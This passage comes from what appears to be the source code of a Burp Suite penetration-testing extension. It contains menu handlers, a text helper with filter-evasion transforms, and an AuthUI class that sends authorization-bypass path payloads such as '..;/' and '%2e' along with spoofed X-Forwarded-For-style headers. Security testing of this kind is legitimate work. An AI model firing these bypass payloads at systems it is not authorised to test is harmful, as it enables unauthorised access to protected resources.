"content": "package burp.menu;\n\nimport burp.IHttpRequestResponse;\nimport burp.utils.Nuclei;\n\nimport javax.swing.*;\nimport java.awt.event.ActionListener;\n\npublic class NucleiMenu extends JMenuItem {\n public NucleiMenu(IHttpRequestResponse[] requestResponses) {\n this.setText(\"^_^ Nuclei Template\");\n this.addActionListener(new ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n Thread thread = new Thread(new Runnable() {\n @Override\n public void run() {\n Nuclei.Generate(requestResponses);\n }\n });\n thread.start();\n\n }\n });\n }\n}\n"
},
{
"path": "src/main/java/burp/menu/PermMenu.java",
"content": "package burp.menu;\n\nimport burp.IHttpRequestResponse;\nimport burp.ui.PermUI;\n\nimport javax.swing.*;\nimport java.awt.event.ActionListener;\n\npublic class PermMenu extends JMenuItem {\n public PermMenu(IHttpRequestResponse[] requestResponses) {\n this.setText(\"^_^ Perm Check\");\n this.addActionListener(new ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n Thread thread = new Thread(new Runnable() {\n @Override\n public void run() {\n PermUI.Check(requestResponses,true);\n }\n });\n thread.start();\n\n }\n });\n }\n}\n"
},
{
"path": "src/main/java/burp/menu/RouteMenu.java",
"content": "package burp.menu;\n\nimport burp.IHttpRequestResponse;\nimport burp.ui.AuthUI;\nimport burp.ui.RouteUI;\n\nimport javax.swing.*;\nimport java.awt.event.ActionListener;\n\npublic class RouteMenu extends JMenuItem {\n public RouteMenu(IHttpRequestResponse[] requestResponses) {\n this.setText(\"^_^ Route Check\");\n this.addActionListener(new ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n Thread thread = new Thread(new Runnable() {\n @Override\n public void run() {\n RouteUI.Check(requestResponses,true);\n }\n });\n thread.start();\n\n }\n });\n }\n}\n"
},
{
"path": "src/main/java/burp/menu/SqlMenu.java",
"content": "package burp.menu;\n\nimport burp.IHttpRequestResponse;\nimport burp.ui.SqlUI;\n\nimport javax.swing.*;\nimport java.awt.event.ActionListener;\n\npublic class SqlMenu extends JMenuItem {\n public SqlMenu(IHttpRequestResponse[] requestResponses) {\n this.setText(\"^_^ Sql Check\");\n this.addActionListener(new ActionListener() {\n public void actionPerformed(java.awt.event.ActionEvent evt) {\n Thread thread = new Thread(new Runnable() {\n @Override\n public void run() {\n SqlUI.Check(requestResponses,true);\n }\n });\n thread.start();\n\n }\n });\n }\n}\n"
},
{
"path": "src/main/java/burp/menu/TextProcessMenu.java",
"content": "package burp.menu;\n\nimport burp.IContextMenuInvocation;\nimport burp.utils.Utils;\n\nimport javax.swing.*;\nimport java.awt.*;\nimport java.awt.datatransfer.Clipboard;\nimport java.awt.datatransfer.StringSelection;\nimport java.net.URLDecoder;\nimport java.nio.charset.StandardCharsets;\nimport java.security.SecureRandom;\nimport java.util.Random;\nimport java.util.stream.Collectors;\nimport java.util.stream.IntStream;\n\n/**\n * 文本处理菜单\n * 提供各种文本转换功能\n */\npublic class TextProcessMenu extends JMenu {\n private final IContextMenuInvocation invocation;\n private final Random random = new Random();\n private final SecureRandom secureRandom = new SecureRandom();\n\n public TextProcessMenu(IContextMenuInvocation invocation) {\n super(\"Helper\");\n this.invocation = invocation;\n initMenu();\n }\n\n /**\n * 初始化菜单项\n */\n private void initMenu() {\n // Unicode解码菜单项\n JMenuItem unicodeDecode = new JMenuItem(\"Unicode Decode\");\n unicodeDecode.addActionListener(e -> processSelectedText(this::unicodeDecode));\n\n // URL解码菜单项\n JMenuItem urlDecode = new JMenuItem(\"URL Decode\");\n urlDecode.addActionListener(e -> processSelectedText(this::urlDecode));\n\n // 关键字拆分菜单项\n JMenuItem splitKeyword = new JMenuItem(\"Split Keyword\");\n splitKeyword.addActionListener(e -> processSelectedText(this::splitKeyword));\n\n // 随机大小写菜单项\n JMenuItem randomCase = new JMenuItem(\"Random Case\");\n randomCase.addActionListener(e -> processSelectedText(this::randomCase));\n\n // 添加生成脏数据菜单项\n JMenuItem dirtyData = new JMenuItem(\"Generate Dirty Data\");\n dirtyData.addActionListener(e -> dirtyGetRandomString());\n\n // 添加Base64数据标签菜单项\n JMenuItem base64Tag = new JMenuItem(\"Insert Base64 Tag\");\n base64Tag.addActionListener(e -> checkBase64Data());\n\n\n add(unicodeDecode);\n add(urlDecode);\n add(splitKeyword);\n add(randomCase);\n add(dirtyData);\n add(base64Tag);\n }\n\n /**\n * 处理选中的文本\n */\n private void processSelectedText(TextProcessor processor) {\n try {\n // 检查消息选择\n if (invocation.getSelectedMessages() == null || invocation.getSelectedMessages().length == 0) {\n JOptionPane.showMessageDialog(null, \"No message selected!\");\n return;\n }\n\n // 获取选择范围\n int[] bounds = invocation.getSelectionBounds();\n if (bounds == null || bounds[0] == bounds[1]) {\n JOptionPane.showMessageDialog(null, \"Please select text first!\");\n return;\n }\n\n // 获取当前选中的文本所在的字节数据\n byte[] contextBytes;\n int context = invocation.getInvocationContext();\n if (context == IContextMenuInvocation.CONTEXT_MESSAGE_EDITOR_REQUEST ||\n context == IContextMenuInvocation.CONTEXT_MESSAGE_VIEWER_REQUEST) {\n contextBytes = invocation.getSelectedMessages()[0].getRequest();\n } else {\n contextBytes = invocation.getSelectedMessages()[0].getResponse();\n }\n\n if (contextBytes == null) {\n JOptionPane.showMessageDialog(null, \"No content available!\");\n return;\n }\n\n // 提取选中的文本部分\n String fullText = new String(contextBytes);\n String selected = fullText.substring(bounds[0], bounds[1]);\n\n // 处理选中的文本\n String processed = processor.process(selected);\n\n // 在弹窗中显示结果\n showProcessedResult(processed);\n\n } catch (Exception ex) {\n Utils.stderr.println(\"Error processing text: \" + ex.getMessage());\n JOptionPane.showMessageDialog(null, \"Error: \" + ex.getMessage());\n }\n }\n\n private void showProcessedResult(String result) {\n // 创建一个可复制的文本区域\n JTextArea textArea = new JTextArea(result);\n textArea.setEditable(false);\n textArea.setWrapStyleWord(true);\n textArea.setLineWrap(true);\n\n // 创建滚动面板\n JScrollPane scrollPane = new JScrollPane(textArea);\n scrollPane.setPreferredSize(new Dimension(400, 300));\n\n // 创建复制按钮\n JButton copyButton = new JButton(\"复制到剪贴板\");\n copyButton.addActionListener(e -> {\n StringSelection stringSelection = new StringSelection(result);\n Clipboard clipboard = Toolkit.getDefaultToolkit().getSystemClipboard();\n clipboard.setContents(stringSelection, null);\n JOptionPane.showMessageDialog(null, \"复制到粘贴板!\", \"Success\", JOptionPane.INFORMATION_MESSAGE);\n });\n\n // 创建包含文本区域和按钮的面板\n JPanel panel = new JPanel(new BorderLayout());\n panel.add(scrollPane, BorderLayout.CENTER);\n panel.add(copyButton, BorderLayout.SOUTH);\n\n // 显示对话框\n JOptionPane.showMessageDialog(\n null,\n panel,\n \"Process Result\",\n JOptionPane.INFORMATION_MESSAGE\n );\n }\n\n /**\n * URL解码并在弹出框中显示结果\n */\n private String urlDecode(String text) {\n try {\n // URL解码,使用UTF-8编码支持中文\n return URLDecoder.decode(text, StandardCharsets.UTF_8.name());\n } catch (Exception e) {\n Utils.stderr.println(\"Error decoding URL: \" + e.getMessage());\n JOptionPane.showMessageDialog(null, \"Error decoding URL: \" + e.getMessage());\n return text;\n }\n }\n\n /**\n * Unicode解码并在弹出框中显示结果\n */\n private String unicodeDecode(String text) {\n StringBuilder result = new StringBuilder();\n int i = 0;\n while (i < text.length()) {\n if (text.startsWith(\"\\\\u\", i) && i + 6 <= text.length()) {\n String hex = text.substring(i + 2, i + 6);\n try {\n result.append((char) Integer.parseInt(hex, 16));\n i += 6;\n continue;\n } catch (NumberFormatException ignored) {\n }\n }\n result.append(text.charAt(i));\n i++;\n }\n return result.toString();\n }\n\n /**\n * 关键字拆分\n */\n private String splitKeyword(String text) {\n StringBuilder result = new StringBuilder();\n int chunkSize = 2; // 每段的默认长度\n\n for (int i = 0; i < text.length(); i += chunkSize) {\n if (i > 0) {\n result.append(\"+\");\n }\n int end = Math.min(i + chunkSize, text.length());\n String chunk = text.substring(i, end);\n result.append(\"'\").append(chunk).append(\"'\");\n }\n\n return result.toString();\n }\n\n /**\n * 随机大小写转换\n */\n private String randomCase(String text) {\n return IntStream.range(0, text.length())\n .mapToObj(i -> {\n char c = text.charAt(i);\n return random.nextBoolean() ?\n Character.toUpperCase(c) :\n Character.toLowerCase(c);\n })\n .map(String::valueOf)\n .collect(Collectors.joining());\n }\n\n /**\n * 生成指定数量的随机字符\n */\n private String getRandomString(int number) {\n StringBuilder str = new StringBuilder(\"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\");\n StringBuilder result = new StringBuilder();\n for (int i = 0; i < number; i++) {\n int index = secureRandom.nextInt(str.length());\n result.append(str.charAt(index));\n }\n return result.toString();\n }\n\n /**\n * 弹窗获取用户输入并生成脏数据\n */\n private void dirtyGetRandomString() {\n String s = JOptionPane.showInputDialog(\"Please Input Data Size(n*kb): \");\n if (s != null && !s.trim().isEmpty()) {\n try {\n int size = Integer.parseInt(s);\n String dirtyData = getRandomString(size * 1024);\n StringSelection stringSelection = new StringSelection(dirtyData);\n Clipboard clipboard = Toolkit.getDefaultToolkit().getSystemClipboard();\n clipboard.setContents(stringSelection, null);\n JOptionPane.showMessageDialog(null, \"请在需要的位置粘贴\", \"Tips\", JOptionPane.INFORMATION_MESSAGE);\n } catch (NumberFormatException ex) {\n JOptionPane.showMessageDialog(null, \"Please input a valid number\", \"Error\", JOptionPane.ERROR_MESSAGE);\n }\n } else {\n JOptionPane.showMessageDialog(null, \"Please Input Data Size\", \"Tips\", JOptionPane.INFORMATION_MESSAGE);\n }\n }\n\n /**\n * 插入Base64数据标签\n */\n private void checkBase64Data() {\n StringSelection stringSelection = new StringSelection(\"\");\n Clipboard clipboard = Toolkit.getDefaultToolkit().getSystemClipboard();\n clipboard.setContents(stringSelection, null);\n JOptionPane.showMessageDialog(null, \"请在需要的位置粘贴\", \"Tips\", JOptionPane.INFORMATION_MESSAGE);\n }\n\n /**\n * 文本处理接口\n */\n @FunctionalInterface\n private interface TextProcessor {\n String process(String text);\n }\n}"
},
{
"path": "src/main/java/burp/ui/AuthUI.java",
"content": "package burp.ui;\n\nimport burp.*;\nimport burp.bean.AuthBean;\nimport burp.utils.I18nUtils;\nimport burp.utils.Utils;\n\nimport javax.swing.*;\nimport javax.swing.table.AbstractTableModel;\nimport javax.swing.table.TableColumnModel;\nimport javax.swing.table.TableModel;\nimport java.awt.*;\nimport java.awt.event.ActionEvent;\nimport java.net.MalformedURLException;\nimport java.net.URL;\nimport java.util.ArrayList;\nimport java.util.Arrays;\nimport java.util.List;\nimport java.util.Objects;\nimport java.util.concurrent.locks.Lock;\nimport java.util.concurrent.locks.ReentrantLock;\n\n/**\n * @Author Xm17\n * @Date 2024-06-22 8:46\n */\npublic class AuthUI implements UIHandler, IMessageEditorController {\n private JPanel panel; // 主面板\n private static JTable authTable; // auth表格\n private JButton btnClear; // 清空按钮\n private JTextField ipInputField; // ip输入框\n private JButton saveBtn; // ip确认按钮\n private JTabbedPane authtabbedPanereq; // 请求tab\n private JTabbedPane authtabbedPaneresp; // 响应tab\n private IHttpRequestResponse currentlyDisplayedItem; // 当前显示的请求\n private IMessageEditor HRequestTextEditor; // 请求编辑器\n private IMessageEditor HResponseTextEditor; // 响应编辑器\n private static final List authlog = new ArrayList<>(); //authlog 列表\n private static final List urlHashList = new ArrayList<>(); // url hash列表\n private static final Lock lock = new ReentrantLock();\n private static String LOCAL_IP = \"127.0.0.1\";\n\n @Override\n public IHttpService getHttpService() {\n return currentlyDisplayedItem.getHttpService();\n }\n\n @Override\n public byte[] getRequest() {\n return currentlyDisplayedItem.getRequest();\n }\n\n @Override\n public byte[] getResponse() {\n return currentlyDisplayedItem.getResponse();\n }\n\n @Override\n public void init() {\n setupUI();\n setupData();\n }\n\n // 初始化数据\n private void setupData() {\n btnClear.addActionListener(new AbstractAction() {\n @Override\n public void actionPerformed(ActionEvent e) {\n // 清空urltable\n authlog.clear();\n HRequestTextEditor.setMessage(new byte[0], true);\n HResponseTextEditor.setMessage(new byte[0], false);\n urlHashList.clear();\n authTable.updateUI();\n }\n });\n saveBtn.addActionListener(new AbstractAction() {\n @Override\n public void actionPerformed(ActionEvent e) {\n if (!ipInputField.getText().equals(LOCAL_IP)) {\n LOCAL_IP = ipInputField.getText();\n }else {\n LOCAL_IP = \"127.0.0.1\";\n }\n }\n });\n }\n\n // 初始化ui\n private void setupUI() {\n panel = new JPanel();\n panel.setLayout(new BorderLayout());\n // 添加FlowLayout布局,将清空按钮添加\n JPanel topPanel = new JPanel(new FlowLayout(FlowLayout.LEFT));\n btnClear = new JButton(I18nUtils.get(\"auth.button.clear\"));\n topPanel.add(btnClear);\n\n JLabel ipLabel = new JLabel(I18nUtils.get(\"auth.label.ip\"));\n topPanel.add(ipLabel);\n\n ipInputField = new JTextField(\"127.0.0.1\");\n topPanel.add(ipInputField);\n\n saveBtn = new JButton(I18nUtils.get(\"auth.button.save\"));\n topPanel.add(saveBtn);\n\n panel.add(topPanel, BorderLayout.NORTH);\n\n // 上下分割面板,比例是7:3\n JSplitPane mainsplitPane = new JSplitPane(JSplitPane.VERTICAL_SPLIT);\n mainsplitPane.setResizeWeight(0.7);\n mainsplitPane.setDividerLocation(0.7);\n\n // 添加URLTable到mainsplitPane的上边\n authTable = new URLTable(new AuthModel());\n authTable.setAutoCreateRowSorter(true);\n JScrollPane scrollPane = new JScrollPane(authTable);\n mainsplitPane.setTopComponent(scrollPane);\n\n // 左右分割面板,对称分割\n JSplitPane splitPaneDown = new JSplitPane(JSplitPane.HORIZONTAL_SPLIT);\n splitPaneDown.setResizeWeight(0.5);\n splitPaneDown.setDividerLocation(0.5);\n // 添加请求响应到左右分割面板\n authtabbedPanereq = new JTabbedPane();\n HRequestTextEditor = Utils.callbacks.createMessageEditor(AuthUI.this, true);\n authtabbedPanereq.addTab(\"Request\", HRequestTextEditor.getComponent());\n\n authtabbedPaneresp = new JTabbedPane();\n HResponseTextEditor = Utils.callbacks.createMessageEditor(AuthUI.this, false);\n authtabbedPaneresp.addTab(\"Response\", HResponseTextEditor.getComponent());\n splitPaneDown.setLeftComponent(authtabbedPanereq);\n splitPaneDown.setRightComponent(authtabbedPaneresp);\n\n\n // 添加splitPaneDown到mainsplitPane的下边\n mainsplitPane.setBottomComponent(splitPaneDown);\n\n panel.add(mainsplitPane, BorderLayout.CENTER);\n }\n\n @Override\n public JPanel getPanel(IBurpExtenderCallbacks callbacks) {\n return panel;\n }\n\n @Override\n public String getTabName() {\n return \"BypassAuth\";\n }\n\n // auth核心检测方法\n public static void Check(IHttpRequestResponse[] requestResponses) {\n lock.lock();\n try {\n IHttpRequestResponse baseRequestResponse = requestResponses[0];\n IRequestInfo analyzeRequest = Utils.helpers.analyzeRequest(baseRequestResponse);\n String method = analyzeRequest.getMethod();\n String path = analyzeRequest.getUrl().getPath();\n String request = Utils.helpers.bytesToString(baseRequestResponse.getRequest());\n List paraLists = analyzeRequest.getParameters();\n URL rdurlURL = analyzeRequest.getUrl();\n String url = analyzeRequest.getUrl().toString();\n byte[] byte_Request = baseRequestResponse.getRequest();\n int len = byte_Request.length;\n byte[] body = Arrays.copyOfRange(byte_Request, analyzeRequest.getBodyOffset(), len);\n // url 中匹配为静态资源\n if (Utils.isUrlBlackListSuffix(url)) {\n return;\n }\n\n List headers = Utils.helpers.analyzeRequest(baseRequestResponse).getHeaders();\n String urlWithoutQuery = \"\";\n try {\n URL url1 = new URL(url);\n String protocol = url1.getProtocol();\n String host = url1.getHost();\n int port = url1.getPort();\n urlWithoutQuery = protocol + \"://\" + host + \":\" + port;\n } catch (MalformedURLException e) {\n throw new RuntimeException(e);\n }\n List authRequests = new ArrayList<>();\n authRequests.addAll(prefix(method, path));\n authRequests.addAll(suffix(method, path));\n\n if (Objects.equals(method, \"GET\") || Objects.equals(method, \"POST\")) {\n for (AuthBean value : authRequests) {\n if (Objects.equals(value.getMethod(), \"GET\")) {\n String new_request = request.replaceFirst(path, value.getPath());\n IHttpRequestResponse response = Utils.callbacks.makeHttpRequest(baseRequestResponse.getHttpService(), Utils.helpers.stringToBytes(new_request));\n String requrl = urlWithoutQuery + value.getPath();\n String statusCode = String.valueOf(Utils.helpers.analyzeResponse(response.getResponse()).getStatusCode());\n String length = String.valueOf(response.getResponse().length);\n add(method, requrl, statusCode, length, response);\n } else if (Objects.equals(value.getMethod(), \"POST\")) {\n String new_request = request.replaceFirst(path, value.getPath());\n IHttpRequestResponse response = Utils.callbacks.makeHttpRequest(baseRequestResponse.getHttpService(), Utils.helpers.stringToBytes(new_request));\n String requrl = urlWithoutQuery + value.getPath();\n String statusCode = String.valueOf(Utils.helpers.analyzeResponse(response.getResponse()).getStatusCode());\n String length = String.valueOf(response.getResponse().length);\n add(method, requrl, statusCode, length, response);\n }\n }\n // 测试伪造ip\n List testHeaders = forgeHeaders(method, url);\n for (AuthBean header : testHeaders) {\n headers.add(header.getHeaders());\n }\n byte[] message = Utils.helpers.buildHttpMessage(headers, body);\n IHttpRequestResponse response = Utils.callbacks.makeHttpRequest(baseRequestResponse.getHttpService(), message);\n String statusCode = String.valueOf(Utils.helpers.analyzeResponse(response.getResponse()).getStatusCode());\n String length = String.valueOf(response.getResponse().length);\n add(method, url, statusCode, length, response);\n for (AuthBean header : testHeaders) {\n headers.remove(header.getHeaders());\n }\n // 单独测试实战绕过案例\n changeAccept(headers, body, method, url, baseRequestResponse);\n }\n } finally {\n lock.unlock();\n }\n }\n\n // 添加数据到表格\n private static void add(String method, String url, String statuscode, String length, IHttpRequestResponse baseRequestResponse) {\n synchronized (authlog) {\n int id = authlog.size();\n authlog.add(new AuthEntry(id, method, url, statuscode, length, baseRequestResponse));\n authTable.updateUI();\n }\n }\n\n // 添加后缀\n public static List suffix(String method, String path) {\n if (path.startsWith(\"//\")) {\n path = \"/\" + path.substring(2).replaceAll(\"/+\", \"/\");\n }\n List authRequests = new ArrayList<>();\n if (path.endsWith(\"/\")) {\n path = path.substring(0, path.length() - 1);\n List payloads = Arrays.asList(path + \"%2e/\", path + \"/.\", \"./\" + path + \"/./\", path + \"%20/\",\n \"/%20\" + path + \"%20/\", path + \"..;/\", path + \"?\", path + \"??\", \"/\" + path + \"//\",\n path + \"/\", path + \"/.randomstring\");\n for (String payload : payloads) {\n if (\"GET\".equals(method)) {\n authRequests.add(new AuthBean(\"GET\", payload, \"\"));\n } else if (\"POST\".equals(method)) {\n authRequests.add(new AuthBean(\"POST\", payload, \"\"));\n }\n }\n } else {\n List payloads = Arrays.asList(path + \"/%2e\", path + \"/%20\", path + \"%0d%0a\", path + \".json\", path + \"/.randomstring\");\n\n for (String payload : payloads) {\n if (\"GET\".equals(method)) {\n authRequests.add(new AuthBean(\"GET\", payload, \"\"));\n } else if (\"POST\".equals(method)) {\n authRequests.add(new AuthBean(\"POST\", payload, \"\"));\n }\n }\n }\n return authRequests;\n }\n\n // 添加前缀\n public static List prefix(String method, String path) {\n if (path.startsWith(\"//\")) {\n path = \"/\" + path.substring(2).replaceAll(\"/+\", \"/\");\n }\n List authRequests = new ArrayList<>();\n String[] prefix = {\";/\", \".;/\", \"images/..;/\", \";a/\", \"%23/../\", \"..;/..;/\"};\n for (String s : prefix) {\n // 将路径按 / 分割为多个部分\n String[] pathParts = path.split(\"/\");\n for (int i = 1; i < pathParts.length; i++) {\n // 输出从第二个部分到最后一个部分\n String[] subPathParts = Arrays.copyOfRange(pathParts, i, pathParts.length);\n String[] prePathParts = Arrays.copyOfRange(pathParts, 1, i);\n if (prePathParts.length > 0) {\n if (\"GET\".equals(method)) {\n authRequests.add(new AuthBean(\"GET\", \"/\" + String.join(\"/\", prePathParts) + \"/\" + s + String.join(\"/\", subPathParts), \"\"));\n } else if (\"POST\".equals(method)) {\n authRequests.add(new AuthBean(\"POST\", \"/\" + String.join(\"/\", prePathParts) + \"/\" + s + String.join(\"/\", subPathParts), \"\"));\n }\n } else {\n if (\"GET\".equals(method)) {\n authRequests.add(new AuthBean(\"GET\", \"/\" + s + String.join(\"/\", subPathParts), \"\"));\n } else if (\"POST\".equals(method)) {\n authRequests.add(new AuthBean(\"POST\", \"/\" + s + String.join(\"/\", subPathParts), \"\"));\n }\n }\n }\n }\n\n return authRequests;\n }\n\n // 添加头部\n public static List forgeHeaders(String method, String url) {\n List authRequests = new ArrayList<>();\n List payloads = Arrays.asList(\n \"X-Forwarded-For: %s\",\n \"X-Originating-IP: %s\",\n \"X-Remote-IP: %s\",\n \"X-Remote-Addr: %s\"\n );\n // 对payloads进行替换\n payloads.replaceAll(s -> String.format(s, LOCAL_IP));\n\n for (String payload : payloads) {\n if (\"GET\".equals(method)) {\n authRequests.add(new AuthBean(\"GET\", \"\", payload));\n } else if (\"POST\".equals(method)) {\n authRequests.add(new AuthBean(\"POST\", \"\", payload));\n }\n }\n return authRequests;\n }\n\n // 添加accept\n // https://mp.weixin.qq.com/s/6YMDu6FTLa_9s6_mewrp0A\n public static void changeAccept(List headers, byte[] body, String method, String url, IHttpRequestResponse baseRequestResponse) {\n // 判断headers立马是否有Accept,如果有则删除\n headers.removeIf(header -> header.startsWith(\"Accept:\"));\n headers.add(\"Accept: application/json, text/javascript, /; q=0.01\");\n byte[] message = Utils.helpers.buildHttpMessage(headers, body);\n IHttpRequestResponse response = Utils.callbacks.makeHttpRequest(baseRequestResponse.getHttpService(), message);\n // 发送请求\n String statusCode = String.valueOf(Utils.helpers.analyzeResponse(response.getResponse()).getStatusCode());\n String length = String.valueOf(response.getResponse().length);\n add(method, url, statusCode, length, response);\n }\n\n // auth实体\n private static class AuthEntry {\n private final int id;\n private final String method;\n private final String url;\n private final String status;\n private final String length;\n private final IHttpRequestResponse requestResponse;\n\n\n public AuthEntry(int id, String method, String url, String status, String length, IHttpRequestResponse requestResponse) {\n this.id = id;\n this.method = method;\n this.url = url;\n this.status = status;\n this.length = length;\n this.requestResponse = requestResponse;\n }\n }\n\n // auth 模型\n private static class AuthModel extends AbstractTableModel {\n\n @Override\n public int getRowCount() {\n return authlog.size();\n }\n\n @Override\n public int getColumnCount() {\n return 5;\n }\n\n @Override\n public Object getValueAt(int rowIndex, int columnIndex) {\n switch (columnIndex) {\n case 0:\n return authlog.get(rowIndex).id;\n case 1:\n return authlog.get(rowIndex).method;\n case 2:\n return authlog.get(rowIndex).url;\n case 3:\n return authlog.get(rowIndex).status;\n case 4:\n return authlog.get(rowIndex).length;\n default:\n return null;\n }\n }\n\n @Override\n public String getColumnName(int column) {\n switch (column) {\n case 0:\n return \"id\";\n case 1:\n return \"method\";\n case 2:\n return \"url\";\n case 3:\n return \"status\";\n case 4:\n return \"length\";\n default:\n return null;\n }\n }\n }\n\n // auth 表格\n private class URLTable extends JTable {\n public URLTable(TableModel dm) {\n super(dm);\n TableColumnModel columnModel = getColumnModel();\n columnModel.getColumn(0).setMaxWidth(50);\n columnModel.getColumn(4).setMaxWidth(50);\n }\n\n @Override\n public void changeSelection(int row, int col, boolean toggle, boolean extend) {\n AuthEntry logEntry = authlog.get(row);\n HRequestTextEditor.setMessage(logEntry.requestResponse.getRequest(), true);\n if (logEntry.requestResponse.getResponse() == null) {\n HResponseTextEditor.setMessage(new byte[0], false);\n } else {\n HResponseTextEditor.setMessage(logEntry.requestResponse.getResponse(), false);\n }\n currentlyDisplayedItem = logEntry.requestResponse;\n super.changeSelection(row, col, toggle, extend);\n }\n }\n\n\n}\n"
},
{
"path": "src/main/java/burp/ui/ConfigUI.java",
"content": "package burp.ui;\n\nimport burp.IBurpExtenderCallbacks;\nimport burp.bean.ConfigBean;\nimport burp.utils.I18nUtils;\nimport burp.utils.UrlCacheUtil;\nimport burp.utils.Utils;\nimport com.intellij.uiDesigner.core.GridConstraints;\nimport com.intellij.uiDesigner.core.GridLayoutManager;\nimport com.intellij.uiDesigner.core.Spacer;\n\nimport javax.swing.*;\nimport javax.swing.table.AbstractTableModel;\nimport java.awt.*;\nimport java.awt.event.ActionEvent;\nimport java.awt.event.ActionListener;\nimport java.util.ArrayList;\nimport java.util.List;\n\nimport static burp.dao.ConfigDao.*;\n\npublic class ConfigUI implements UIHandler {\n private static final List data = new ArrayList<>();\n public AbstractTableModel dataModel = new ConfigModel();\n private JPanel panel;\n private JPanel configPanel;\n private JLabel dnslogLabel;\n private JTextField dnslogTextField;\n private JLabel ipLabel;\n private JTextField ipTextField;\n private JLabel toolNameLabel;\n private JTextField toolNameTextField;\n private JButton toolButton;\n private JTextField toolArgvTextField;\n private JButton ipButton;\n private JButton dnslogButton;\n private JLabel toolArgvLabel;\n private JButton refershButton;\n private JButton deleteSelectButton;\n private JButton clearCacheButton;\n private JButton resetUrl;\n private JTable configTable;\n private JScrollPane configPanelDownJscrollPanel;\n private JPanel configPanelTop;\n private JPanel configPanelDown;\n private JLabel languageLabel;\n private JComboBox languageComboBox;\n\n private void setupUI() {\n // 创建主面板\n panel = new JPanel();\n panel.setLayout(new GridLayoutManager(1, 1, new Insets(0, 0, 0, 0), -1, -1));\n\n // 创建配置面板\n configPanel = new JPanel();\n configPanel.setLayout(new BorderLayout(0, 0));\n panel.add(configPanel, new GridConstraints(0, 0, 1, 1,\n GridConstraints.ANCHOR_CENTER, GridConstraints.FILL_BOTH,\n GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_CAN_GROW,\n GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_CAN_GROW,\n null, null, null, 0, false));\n\n // 配置顶部面板\n configPanelTop = new JPanel();\n configPanelTop.setLayout(new GridLayoutManager(5, 9, new Insets(10, 10, 10, 10), 5, 5)); // 增加间距,添加语言选择行\n configPanel.add(configPanelTop, BorderLayout.NORTH);\n\n // 语言选择行\n languageLabel = new JLabel();\n languageLabel.setText(I18nUtils.get(\"common.label.language\"));\n configPanelTop.add(languageLabel, new GridConstraints(0, 0, 1, 1,\n GridConstraints.ANCHOR_WEST, GridConstraints.FILL_NONE,\n GridConstraints.SIZEPOLICY_FIXED, GridConstraints.SIZEPOLICY_FIXED,\n null, null, null, 0, false));\n\n languageComboBox = new JComboBox<>(new String[]{\"English\", \"中文\"});\n languageComboBox.setSelectedItem(I18nUtils.isChinese() ? \"中文\" : \"English\");\n configPanelTop.add(languageComboBox, new GridConstraints(0, 1, 1, 3,\n GridConstraints.ANCHOR_WEST, GridConstraints.FILL_HORIZONTAL,\n GridConstraints.SIZEPOLICY_WANT_GROW, GridConstraints.SIZEPOLICY_FIXED,\n null, new Dimension(250, -1), null, 0, false));\n\n // DNS日志配置行\n dnslogLabel = new JLabel();\n dnslogLabel.setText(I18nUtils.get(\"config.label.dnslog\"));\n configPanelTop.add(dnslogLabel, new GridConstraints(1, 0, 1, 1,\n GridConstraints.ANCHOR_WEST, GridConstraints.FILL_NONE,\n GridConstraints.SIZEPOLICY_FIXED, GridConstraints.SIZEPOLICY_FIXED,\n null, null, null, 0, false));\n\n dnslogTextField = new JTextField();\n configPanelTop.add(dnslogTextField, new GridConstraints(1, 1, 1, 3,\n GridConstraints.ANCHOR_WEST, GridConstraints.FILL_HORIZONTAL,\n GridConstraints.SIZEPOLICY_WANT_GROW, GridConstraints.SIZEPOLICY_FIXED,\n null, new Dimension(250, -1), null, 0, false));\n\n dnslogButton = new JButton();\n dnslogButton.setText(I18nUtils.get(\"config.button.save\"));\n configPanelTop.add(dnslogButton, new GridConstraints(1, 4, 1, 1,\n GridConstraints.ANCHOR_CENTER, GridConstraints.FILL_HORIZONTAL,\n GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_CAN_GROW,\n GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false));\n\n // IP配置行\n ipLabel = new JLabel();\n ipLabel.setText(I18nUtils.get(\"config.label.ip\"));\n configPanelTop.add(ipLabel, new GridConstraints(2, 0, 1, 1,\n GridConstraints.ANCHOR_WEST, GridConstraints.FILL_NONE,\n GridConstraints.SIZEPOLICY_FIXED, GridConstraints.SIZEPOLICY_FIXED,\n null, null, null, 0, false));\n\n ipTextField = new JTextField();\n configPanelTop.add(ipTextField, new GridConstraints(2, 1, 1, 3,\n GridConstraints.ANCHOR_WEST, GridConstraints.FILL_HORIZONTAL,\n GridConstraints.SIZEPOLICY_WANT_GROW, GridConstraints.SIZEPOLICY_FIXED,\n null, new Dimension(250, -1), null, 0, false));\n\n ipButton = new JButton();\n ipButton.setText(I18nUtils.get(\"config.button.save\"));\n configPanelTop.add(ipButton, new GridConstraints(2, 4, 1, 1,\n GridConstraints.ANCHOR_CENTER, GridConstraints.FILL_HORIZONTAL,\n GridConstraints.SIZEPOLICY_CAN_SHRINK | GridConstraints.SIZEPOLICY_CAN_GROW,\n GridConstraints.SIZEPOLICY_FIXED, null, null, null, 0, false));\n\n // 工具配置行\n toolNameLabel = new JLabel();\n toolNameLabel.setText(I18nUtils.get(\"config.label.tool_name\"));\n configPanelTop.add(toolNameLabel, new GridConstraints(3, 0, 1, 1,\n GridConstraints.ANCHOR_WEST, GridConstraints.FILL_NONE,\n GridConstraints.SIZEPOLICY_FIXED, GridConstraints.SIZEPOLICY_FIXED,\n null, null, null, 0, false));\n\n toolNameTextField = new JTextField();\n configPanelTop.add(toolNameTextField, new GridConstraints(3, 1, 1, 1,\n GridConstraints.ANCHOR_WEST, GridConstraints.FILL_HORIZONTAL,\n GridConstraints.SIZEPOLICY_WANT_GROW, GridConstraints.SIZEPOLICY_FIXED,\n null, new Dimension(150, -1), null, 0, false));\n\n toolArgvLabel = new JLabel();\n toolArgvLabel.setText(I18nUtils.get(\"config.label.tool_args\"));\n configPanelTop.add(toolArgvLabel, new GridConstraints(3, 2, 1, 1,\n GridConstraints.ANCHOR_WEST, GridConstraints.FILL_NONE,\n GridConstraints.SIZEPOLICY_FIXED, 